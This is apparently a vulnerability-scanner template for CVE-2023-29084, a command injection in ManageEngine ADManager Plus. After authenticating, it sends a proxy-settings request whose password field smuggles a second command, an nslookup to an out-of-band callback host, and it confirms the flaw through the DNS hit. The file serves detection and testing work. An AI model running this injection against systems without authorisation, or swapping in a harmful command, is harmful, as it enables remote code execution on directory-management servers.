id: CVE-2023-29084

info:
  name: ManageEngine ADManager Plus - Command Injection
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
  remediation: |
    Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in ManageEngine ADManager Plus.
  reference:
    - https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/
    - https://community.grafana.com/t/release-notes-v6-3-x/19202
    - http://packetstormsecurity.com/files/172755/ManageEngine-ADManager-Plus-Command-Injection.html
    - https://manageengine.com
    - https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-29084
    cwe-id: CWE-77
    epss-score: 0.35624
    epss-percentile: 0.96672
    cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: zohocorp
    product: manageengine_admanager_plus
  tags: packetstorm,cve,cve2023,manageengine,admanager,rce,oast,authenticated
variables:
  cmd: "nslookup.exe {{interactsh-url}} 1.1.1.1"

http:
  - raw:
      - |
        POST /j_security_check HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        is_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator
      - |
        GET /home.do HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /api/json/admin/saveServerSettings HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        params=[{"tabId":"proxy","ENABLE_PROXY":true,"SERVER_NAME":"1.1.1.1","USER_NAME":"random","PASSWORD":"asd\r\n{{cmd}}","PORT":"80"}]&admpcsrf={{admpcsrf}}

    cookie-reuse: true
    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"message":"'
          - 'Proxy Settings'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

    extractors:
      - type: kval
        name: admpcsrf
        internal: true
        kval:
          - admpcsrf
        part: header
# digest: 4a0a00473045022100a1e041be119990ed6728704d1585ce7a3d60e11969bd996679309235f44dc5b2022038fe89cc5bc9f42dcf2620b690422a87e8d55d8de53c2ce4cc0734dcd3b1d82c:922c64590222798bb761d5b6d8e72950